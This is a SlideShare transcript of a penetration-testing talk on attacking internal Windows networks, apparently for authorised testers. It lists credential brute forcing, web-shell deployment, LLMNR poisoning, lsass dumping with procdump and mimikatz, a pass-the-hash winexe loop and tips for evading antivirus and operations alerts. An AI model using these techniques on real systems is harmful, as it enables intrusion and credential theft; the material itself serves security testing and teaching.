SlideShare a Scribd company logo

Why internal pen tests are still fun

P
pyschedelicsupernova
SoftwareTechnology
1 of 32
Why Internal Pen-Tests are still FUN !
Why other pen-tests suck ! (not hating) • External – Unless your SE’ing someone its pretty boring. (nessus/qualys grepping human thou art l33t) • Web Apps – Unless you get SQLi or file upload or good business logic bugs. (Oh burp scanning/intruder ninja thou art l33t) • Mobile – Fun unlimited but limited by small threat surface
Internal Pen-Tests • SHELLS! SHELLS! SHELLS! – Oh beautiful Shellness! • Nothing beats the joy of popping a box ! • If Local Admin get Domain admin – always a new challenge ! • Data – Oh delicious customer data ! • Mad respect from client “More pen-tests…more monnneeyyy” – Hans Michael Varbaek
Why we still own Internal Networks • Weak passwords – Welcome1 still works in 2013
Why we still own Internal Networks • No patching – MS08-67 still works in 2013
Why we still own Internal Networks • No access controls – RDP/SSH anywhere
Easy Pwnage • This stuff still works not because your l33t but because your customer is clueless about securing stuff. – Password attacks • SMB bruteforce from list of domain users (null sessions or using compromised host that gave you a domain user cred) • ^ check password policy before going haywire. • SSH, MSSQL etc (sa,sa still works in 2013) • Metasploit auxillary modules / Nmap scripts are your best friend. (you know most of the good ones r8 ?) • Run all of them if you’ve got time. You never know how low the fruit is hanging unless you bend down. • Nessus/Qualys generally are pretty bad at brueforcing stuff. • Use intelligent word lists – mixin company name
Easy Pwnage – Not Patching • Any vulnerable software that Qualys/Nessus finds - if metasploit has a module for it = easy win. – Web consoles (I like these – find them all the time!) • Jboss JMX consoles (setup shell.war and invoke) • Tomcat manager (deploy shell.war) – These usually run as SYSTEM on a windows box. • Any file upload from a web app that is internal (Don’t waste time on this, if you do see something interesting have a poke) – GPO cpassword (Group Policy Preference XML) • post/windows/gather/credentials/gpp – de base 64 and then decrypt using MS provided public AES key • Most likely local administrator password (re-used across all hosts that were deployed with GPPs)
Easy Pwnage Filebrowser -> when cmd.jsp gets picked up by AV http://www.vonloesch.de/filebrowser.html
Easy Pwnage Filebrowser
Laudanum • http://sourceforge.net/projects/laudanum/file s/laudanum-0.8/ • Bunch of good web shells for most languages
Easy Pwnage • Easy Pwnage =
Why are we doing all this anyway ?? • Get sensitive data and show customer the real risk of allowing “Mr.Evil” to connect to their internal network – Hunting for data : • Local admin -> Domain Admin -> Search for data everywhere (usually databases – unless they're really stupid and store it in unencrypted flat files) Lesson learnt – Some clients don’t even know what data is important to them. - CEO’s Mailbox is a good start
Super Secure Customer • Everything is patched • Super random awesomely strong passwords • Apps are secure coded – no SQLi and no file upload • AV everywhere – I mean everywhere • ^ AV cant be turned off unless you provide password • OMG ! – I should quit pen-testing.
Responder • Developed by Laurent Gaffié (Trustwave) • LLMNR and NBT-NS poisoning (Google for what this) – If DNS and hosts file fails, tool yells out saying I’ll resolve that for you and then steals your creds ! – DEMO – Hashes can be cracked via John or can be relayed: http://pen-testing.sans.org/blog/pen- testing/2013/04/25/smb-relay-demystified-and-ntlmv2- pwnage-with-python
Responder • Tons of other features – Google “responder trustwave” – Does ICMP re-direct (this is effing awesome – but only works for anything older than Vista/2k8) – Abuse WPAD (Another kool feature) – HTTP, FTP module. • Make sure you are on a workstation subnet for maximum hits.
OK – THAT DINT WORK ?? • Give up and go home ??
I SAY NO ! • Meet the angry, I will pwn you pentester !
Get your Ducky on • HID usb thingy that has a small programmable chip. • When user leaves desktop/laptop unlocked run and connect. (or walk if your not that enthusiastic) • Quickly add user, enable rdp, grab password hashes, system info etc and ship to ur ftp server. (whatever privs user has – ducky has) • Easy to write scripts – write, compile with java load onto Ducky. • ^ Way easier than teensy – Although teensy can be used in stealth/SE tactics. Teensy inside mouse, teensy inside keyboard etc.
DUCKY DEMO • If it quacks like a duck – it must be a duck • Video
SAFE PASSWORD DUMPING • Old school password dumping tools get picked by AV (cain, pwdump etc) • New ones are getting picked up as well (WCE, mimikatz etc) – These two can dump plain- text passwords from memory. • Disable AV ? • What if AV can only be disabled using a password ?
SAFE PASSWORD DUMPING • You don’t have to disable AV or trigger it. • Procdump from sysinternals – C:windowstempprocdump.exe -accepteula -ma lsass.exe C:windowstemplsassdump.dmp – Mimikatz can then chew the .dmp file and spit out passwords in clear text.
SAFE PASSWORD DUMPING • Some old methods still work and don’t get picked by AV – hashes from hives: • Reg copy (C:>reg.exe save HKLMSAM sam) • Shadow volume copy (good to grab NTDIS) • ^ Ops guy now do check logs for shadow volume copies and so I’d recommend using SAMEX. (http://www.josho.org/blog//blog/2013/03/0 7/samex/)
Searching for Domain Admin • So you popped a few boxes - got some hashes • What now ? • If one of those boxes : – had a domain admin logged in – you have his password in plain-text or got his hash -> game over. – had a service running as domain admin – move to process, pop shell -> game over. • Shares the same local administrator password across the network. – Spray the hash and look for boxes with processes running as domain admin.
Searching for Domain Admin #!/bin/sh for ip in $(cat ip.txt);do ./winexe -U Administrator%passwordhash //$ip "ipconfig" ./winexe -U Administrator%passwordhash //$ip "tasklist /v" Done • ^ Metasploit module auxiliary/admin/smb/psexec_command also works. Do not use windows/smb/psexec as this uploads an exe to the box and will trigger AV. • Login to box running the domain admin process – dump hash or read from lsass as plain text. • Replay hash or login as domain admin over RDP etc. • Game over. – Pro Stealth tip : Once you get a domain admin shell DO NOT CREATE a new domain admin user. • This will trigger Ops as a lot of organisations are alerted if a new domain administrator is created.
Looting • Go after SQL servers – you should have a list of these from your scans • Shares – Yes people still store heaps of confidential stuff unencrypted in shares • Have you guys seen Firefox PTH ? – All ur OWA and sharepoint r belong 2 us ! • Metasploit – post exploitation modules – store loot in MSF DB for grepping later.
Firefox PTH • DEMO • https://code.google.com/p/passing-the- hash/downloads/list
Mitigations • You cant really stop a determined attacker • There are just way too many ways you could get hacked • Best bet is to detect • Check anomalies – New user creation (DA etc), Local admin logons, AV pickups etc • User education • Google’s new n/w architecture – All zones are untrust (Not a bad idea eh ?) • Obvious old school protections should still apply – Patching, strong passwords, access controls etc
Testing “Pro” tips • Don’t leave any accounts you create on customer’s network – delete everything (Finding DA account by pen-tester in last engagement = fail) • Bruteforce wisely – locking out an important service will not go down well with a customer (Bump down threads = increase stealth) • Don’t disable AV – Intelligent Ops are alerted if AV dies • Wipe your VM after every pen-test – A clean slate to work on is so much better • Snapshotting to have all your tools set-up and then reset also works • Script for linux is your best friend • Notes – always good for other eyes trying to read and understand what you did (doesn’t even have to be fancy - Vi or notepad works) • Videos for complex attacks – I’d highly recommend it (mind you this is gonna eat some disk space and sending this to a client might be difficult)
Music (Ignore slide if you don’t listen to music) • Messhugah, Lamb of God and Tool - when ur feeling effing awesome and pwning like a baws • Trying really hard for a breakthrough or fighting a problem – Really fast techno or dubstep • When you lose it and wanna break your laptop – Vitamin string quartet (trust me this works)
That’s it • Things I want to work on (any help will earn beers and respect): – Write more ducky scripts (hopefully run faster and grab more stuff, reverse shell etc) – Write post exploit modules (which can loot more efficiently) – Setup a Pi that can do all this over 3/4g to be sent to client so I can watch BSG and sip beer. – Hope this helped. Google for anything that I may have not provided a link or explained in detail Blog: http://psychsec.wordpress.com/

Recommended

Try harder or go home
Try harder or go homeTry harder or go home
Try harder or go homejaredhaight
 
Ranger BSides-FINAL
Ranger BSides-FINALRanger BSides-FINAL
Ranger BSides-FINALChristopher Duffy, D.Sc.
 
Debugging multiplayer games
Debugging multiplayer gamesDebugging multiplayer games
Debugging multiplayer gamesMaciej Siniło
 
Who Should Use Powershell? You Should Use Powershell!
Who Should Use Powershell? You Should Use Powershell!Who Should Use Powershell? You Should Use Powershell!
Who Should Use Powershell? You Should Use Powershell!Ben Finke
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitjaredhaight
 
Introduction to .NET Performance Measurement
Introduction to .NET Performance MeasurementIntroduction to .NET Performance Measurement
Introduction to .NET Performance MeasurementSasha Goldshtein
 
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Jeremy Brown
 
The 5 Minute MySQL DBA
The 5 Minute MySQL DBAThe 5 Minute MySQL DBA
The 5 Minute MySQL DBAIrawan Soetomo
 

Recommended

Try harder or go home
Try harder or go homeTry harder or go home
Try harder or go homejaredhaight
 
Ranger BSides-FINAL
Ranger BSides-FINALRanger BSides-FINAL
Ranger BSides-FINALChristopher Duffy, D.Sc.
 
Debugging multiplayer games
Debugging multiplayer gamesDebugging multiplayer games
Debugging multiplayer gamesMaciej Siniło
 
Who Should Use Powershell? You Should Use Powershell!
Who Should Use Powershell? You Should Use Powershell!Who Should Use Powershell? You Should Use Powershell!
Who Should Use Powershell? You Should Use Powershell!Ben Finke
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitjaredhaight
 
Introduction to .NET Performance Measurement
Introduction to .NET Performance MeasurementIntroduction to .NET Performance Measurement
Introduction to .NET Performance MeasurementSasha Goldshtein
 
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Jeremy Brown
 
The 5 Minute MySQL DBA
The 5 Minute MySQL DBAThe 5 Minute MySQL DBA
The 5 Minute MySQL DBAIrawan Soetomo
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSRob Fuller
 
Oscp preparation
Oscp preparationOscp preparation
Oscp preparationManich Koomsusi
 
Experiences with Debugging Data Races
Experiences with Debugging Data RacesExperiences with Debugging Data Races
Experiences with Debugging Data RacesAzul Systems Inc.
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using KautilyaNikhil Mittal
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
OWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP HackathonOWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP HackathonSimon Bennetts
 
PAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLERPAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLERNeotys
 
Automate Yo'self -- SeaGL
Automate Yo'self -- SeaGL Automate Yo'self -- SeaGL
Automate Yo'self -- SeaGL John Anderson
 
2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CD2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CDSimon Bennetts
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedAlex Davies
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Daniel Bohannon
 
EhTrace -- RoP Hooks
EhTrace -- RoP HooksEhTrace -- RoP Hooks
EhTrace -- RoP HooksShane Macaulay
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
 
Steelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with PythonSteelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with Pythoninfodox
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
 
Racing with Droids
Racing with DroidsRacing with Droids
Racing with DroidsPeter Hlavaty
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devicesNikhil Mittal
 
Hacking Virtual Appliances
Hacking Virtual AppliancesHacking Virtual Appliances
Hacking Virtual AppliancesJeremy Brown
 
Evolución de la web. zaida aguilar
Evolución de la web. zaida aguilarEvolución de la web. zaida aguilar
Evolución de la web. zaida aguilarUniversidad Politécnica Territorial Andrés Eloy Blanco
 
WPunzalanCV_upd012016 ver 1_pdf
WPunzalanCV_upd012016 ver 1_pdfWPunzalanCV_upd012016 ver 1_pdf
WPunzalanCV_upd012016 ver 1_pdfWilson Punzalan
 

More Related Content

What's hot

A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSRob Fuller
 
Experiences with Debugging Data Races
Experiences with Debugging Data RacesExperiences with Debugging Data Races
Experiences with Debugging Data RacesAzul Systems Inc.
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using KautilyaNikhil Mittal
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
OWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP HackathonOWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP HackathonSimon Bennetts
 
PAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLERPAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLERNeotys
 
Automate Yo'self -- SeaGL
Automate Yo'self -- SeaGL Automate Yo'self -- SeaGL
Automate Yo'self -- SeaGL John Anderson
 
2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CD2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CDSimon Bennetts
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedAlex Davies
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Daniel Bohannon
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
 
Steelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with PythonSteelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with Pythoninfodox
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devicesNikhil Mittal
 
Hacking Virtual Appliances
Hacking Virtual AppliancesHacking Virtual Appliances
Hacking Virtual AppliancesJeremy Brown
 

What's hot (20)

A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNS
 
Oscp preparation
Oscp preparationOscp preparation
Oscp preparation
 
Experiences with Debugging Data Races
Experiences with Debugging Data RacesExperiences with Debugging Data Races
Experiences with Debugging Data Races
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using Kautilya
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
OWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP HackathonOWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP Hackathon
 
PAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLERPAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLER
 
Automate Yo'self -- SeaGL
Automate Yo'self -- SeaGL Automate Yo'self -- SeaGL
Automate Yo'self -- SeaGL
 
2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CD2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CD
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017
 
EhTrace -- RoP Hooks
EhTrace -- RoP HooksEhTrace -- RoP Hooks
EhTrace -- RoP Hooks
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
 
Steelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with PythonSteelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with Python
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
 
Racing with Droids
Racing with DroidsRacing with Droids
Racing with Droids
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devices
 
Hacking Virtual Appliances
Hacking Virtual AppliancesHacking Virtual Appliances
Hacking Virtual Appliances
 

Viewers also liked

WPunzalanCV_upd012016 ver 1_pdf
WPunzalanCV_upd012016 ver 1_pdfWPunzalanCV_upd012016 ver 1_pdf
WPunzalanCV_upd012016 ver 1_pdfWilson Punzalan
 
Kyeongan Kwon - PhD Dissertation 2016
Kyeongan Kwon - PhD Dissertation 2016Kyeongan Kwon - PhD Dissertation 2016
Kyeongan Kwon - PhD Dissertation 2016Karl Kwon, Ph.D.
 
Diferencias entre web 1.0 y 2.0
Diferencias entre web 1.0 y 2.0Diferencias entre web 1.0 y 2.0
Diferencias entre web 1.0 y 2.0ApaivaM
 
What Friendship Means
What Friendship MeansWhat Friendship Means
What Friendship MeansAnnabethC
 
Iron maiden
Iron maidenIron maiden
Iron maidenjrcktm
 
Tabella indennità fine mandato regioni settembre 2011
Tabella indennità fine mandato regioni settembre 2011Tabella indennità fine mandato regioni settembre 2011
Tabella indennità fine mandato regioni settembre 2011Giulio Cavalli
 
C.V Momen.last update
C.V Momen.last updateC.V Momen.last update
C.V Momen.last updateMomen Mohamed
 
Advanced Anti surge Control System for Turbine Driven Centrifugal Compressors
Advanced Anti surge Control System for Turbine Driven Centrifugal CompressorsAdvanced Anti surge Control System for Turbine Driven Centrifugal Compressors
Advanced Anti surge Control System for Turbine Driven Centrifugal CompressorsArslan Ahmed Amin
 
Importance of multimedia
Importance of multimediaImportance of multimedia
Importance of multimediaOnline
 

Viewers also liked (11)

Evolución de la web. zaida aguilar
Evolución de la web. zaida aguilarEvolución de la web. zaida aguilar
Evolución de la web. zaida aguilar
 
WPunzalanCV_upd012016 ver 1_pdf
WPunzalanCV_upd012016 ver 1_pdfWPunzalanCV_upd012016 ver 1_pdf
WPunzalanCV_upd012016 ver 1_pdf
 
Kyeongan Kwon - PhD Dissertation 2016
Kyeongan Kwon - PhD Dissertation 2016Kyeongan Kwon - PhD Dissertation 2016
Kyeongan Kwon - PhD Dissertation 2016
 
Diferencias entre web 1.0 y 2.0
Diferencias entre web 1.0 y 2.0Diferencias entre web 1.0 y 2.0
Diferencias entre web 1.0 y 2.0
 
Student evaluation ADE Associates
Student evaluation ADE AssociatesStudent evaluation ADE Associates
Student evaluation ADE Associates
 
What Friendship Means
What Friendship MeansWhat Friendship Means
What Friendship Means
 
Iron maiden
Iron maidenIron maiden
Iron maiden
 
Tabella indennità fine mandato regioni settembre 2011
Tabella indennità fine mandato regioni settembre 2011Tabella indennità fine mandato regioni settembre 2011
Tabella indennità fine mandato regioni settembre 2011
 
C.V Momen.last update
C.V Momen.last updateC.V Momen.last update
C.V Momen.last update
 
Advanced Anti surge Control System for Turbine Driven Centrifugal Compressors
Advanced Anti surge Control System for Turbine Driven Centrifugal CompressorsAdvanced Anti surge Control System for Turbine Driven Centrifugal Compressors
Advanced Anti surge Control System for Turbine Driven Centrifugal Compressors
 
Importance of multimedia
Importance of multimediaImportance of multimedia
Importance of multimedia
 

Similar to Why internal pen tests are still fun

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidMatthew Johnson
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016Chris Gates
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionBeau Bullock
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonThe basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonKenneth Kwon
 
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...srisatish ambati
 
Packaging is the Worst Way to Distribute Software, Except for Everything Else
Packaging is the Worst Way to Distribute Software, Except for Everything ElsePackaging is the Worst Way to Distribute Software, Except for Everything Else
Packaging is the Worst Way to Distribute Software, Except for Everything Elsemckern
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploitTiago Henriques
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andAlisa Esage Шевченко
 
Defcon - Veil-Pillage
Defcon - Veil-PillageDefcon - Veil-Pillage
Defcon - Veil-PillageVeilFramework
 
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Chris Tankersley
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEChris Gates
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 
Windows logging workshop - BSides Austin 2014
Windows logging workshop - BSides Austin 2014Windows logging workshop - BSides Austin 2014
Windows logging workshop - BSides Austin 2014Michael Gough
 
Advanced windows debugging
Advanced windows debuggingAdvanced windows debugging
Advanced windows debuggingchrisortman
 
DEF CON 23 - Hacking Web Apps @brentwdesign
DEF CON 23 - Hacking Web Apps @brentwdesignDEF CON 23 - Hacking Web Apps @brentwdesign
DEF CON 23 - Hacking Web Apps @brentwdesignbrentwdesign
 
Ask a Malware Archaeologist
Ask a Malware ArchaeologistAsk a Malware Archaeologist
Ask a Malware ArchaeologistMichael Gough
 
Esage on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interactionEsage on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interactionDefconRussia
 

Similar to Why internal pen tests are still fun (20)

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue Kid
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonThe basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
 
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
 
Packaging is the Worst Way to Distribute Software, Except for Everything Else
Packaging is the Worst Way to Distribute Software, Except for Everything ElsePackaging is the Worst Way to Distribute Software, Except for Everything Else
Packaging is the Worst Way to Distribute Software, Except for Everything Else
 
Ansible - A 'crowd' introduction
Ansible - A 'crowd' introductionAnsible - A 'crowd' introduction
Ansible - A 'crowd' introduction
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploit
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits and
 
Defcon - Veil-Pillage
Defcon - Veil-PillageDefcon - Veil-Pillage
Defcon - Veil-Pillage
 
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
 
Windows logging workshop - BSides Austin 2014
Windows logging workshop - BSides Austin 2014Windows logging workshop - BSides Austin 2014
Windows logging workshop - BSides Austin 2014
 
Automating with Ansible
Automating with AnsibleAutomating with Ansible
Automating with Ansible
 
Advanced windows debugging
Advanced windows debuggingAdvanced windows debugging
Advanced windows debugging
 
DEF CON 23 - Hacking Web Apps @brentwdesign
DEF CON 23 - Hacking Web Apps @brentwdesignDEF CON 23 - Hacking Web Apps @brentwdesign
DEF CON 23 - Hacking Web Apps @brentwdesign
 
Ask a Malware Archaeologist
Ask a Malware ArchaeologistAsk a Malware Archaeologist
Ask a Malware Archaeologist
 
Esage on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interactionEsage on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interaction
 

Recently uploaded

Introduction to Firebase Workshop Slides
Introduction to Firebase Workshop SlidesIntroduction to Firebase Workshop Slides
Introduction to Firebase Workshop Slidesvaideheekore1
 
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsChristian Birchler
 
Not a Kubernetes fan? The state of PaaS in 2024
Not a Kubernetes fan? The state of PaaS in 2024Not a Kubernetes fan? The state of PaaS in 2024
Not a Kubernetes fan? The state of PaaS in 2024Anthony Dahanne
 
SpotFlow: Tracking Method Calls and States at Runtime
